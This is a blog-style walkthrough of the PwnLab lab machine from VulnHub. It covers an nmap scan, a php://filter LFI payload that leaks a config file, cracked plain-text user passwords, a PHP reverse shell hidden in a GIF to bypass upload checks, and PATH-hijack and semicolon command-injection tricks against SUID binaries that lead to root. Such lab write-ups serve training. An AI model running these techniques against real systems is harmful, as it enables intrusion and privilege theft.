VulnHub — PwnLab

Raj Singh Chauhan
5 min readOct 5, 2019

Nmap

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PwnLab Intranet Image Hosting
111/tcp open rpcbind 2–4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 40263/udp status
| 100024 1 43941/tcp status
| 100024 1 57975/tcp6 status
|_ 100024 1 58179/udp6 status
3306/tcp open mysql MySQL 5.5.47–0+deb8u1
| mysql-info:
| Protocol: 10
| Version: 5.5.47–0+deb8u1
| Thread ID: 38
| Capabilities flags: 63487
| Some Capabilities: IgnoreSigpipes, InteractiveClient, Support41Auth, SupportsLoadDataLocal, ConnectWithDatabase, LongPassword, Speaks41ProtocolOld, SupportsTransactions, Speaks41ProtocolNew, LongColumnFlag, IgnoreSpaceBeforeParenthesis, FoundRows, SupportsCompression, DontAllowDatabaseTableColumn, ODBCClient, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
| Status: Autocommit
| Salt: Sp[Y+iQ9h#r7Y:V$K1R+
|_ Auth Plugin Name: mysql_native_password
43941/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:37:E0:05 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2–4.9
Uptime guess: 198.839 days (since Wed Mar 20 13:06:13 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros

Got http and mysql to be working , so let’s start enumerating with http we got pwnlab index page which is having login , upload and home option at index page

So when we choose any option from them is calls them with page parameter so there might be a chance for LFI which can be very useful for us , so let’s apply the ways through which we can gather information using page parameter

http://10.0.0.21/?page=php://filter/convert.base64-encode/resource=config

BOOM !!! found LFI to be working and we can see the config file

When we decode the base64 encoded output we get the credentials for MYSQL and the DATABASE to he USER , and we are having mysql port open on the target so let’s connect the mysql remotely with the credentials

Here we found users and pass so let’s apply them on login page and let’s see which user is having right’s to log in , so let’s decode the base64 hash of mysql users and we got the plain text password as

kent - JWzXuBJJNy
mike - SIfdsTEn6I
kane - iSv5Ym2GRo

Got the valid login of “mike” user and we got upload option so let’s upload our php-reverse-shell , but we are not allowed to upload php reverse shell

As we can see that there are filter which are checking the extension , so when we try to bypass the the upload filter by using double extension , php-reverse-shell.php.jpg it gives error

So now we observe that now it’s now checking the content too….. so now we are going to edit a gif file so let’s make our own gif file with our reverse shell

So we created a file with .gif extension and having header of gif file and our php reverse shell payload.

And now we have to find a way through which we can execute our shell , so tried the base64 way as same as the way we taken out the config file we will see the index file and in index it says that with cookie parameter it’s uses another parameter “lang” which can help us in executing our file

So we will use burpsuit and utilize the lang parameter to execute our file , now upload our new .gif file having our reverse shell in it , and see it’s uploaded name because at upload.php we had seen that it’s changing the original name in md5 format .

And here we got our www-data shell

Now let’s begin our enumeration for privilege escalation as are having user credentials which we got form remote mysql so let’s use them as we got the access to kane , at /home/kane we got msgmike which is having suid of mike so we can use this to get mike user , when we use “strings msgmike” to see what is it doing so there we see that it’s using cat command to read the file inside /home/mike/msg.txt so here we can bypass the cat by creating our own cat command and then we will set the path for our cat command , and then when we will execute msgmike it will execute it with our own command which we are giving in it

Commands used { NOTE :- run all this commands at kane directory }echo “/bin/bash” > cat PATH=/home/kane./msgmikePATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/share/games:/usr/local/sbin:/usr/sbin:/sbin:/root/.local/bin:/snap/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binid

And here we got mike user and on moving to mike directory we got to see another root suid at msg2root and here it’s using echo command and writing the content at root directory using echo command

So we can bypass it using ./msg2root and we will break the echo command using ; and then we will use /bin/bash -p to get the root user shell as show below

………………………………COWABUNGA………………………………………

--

--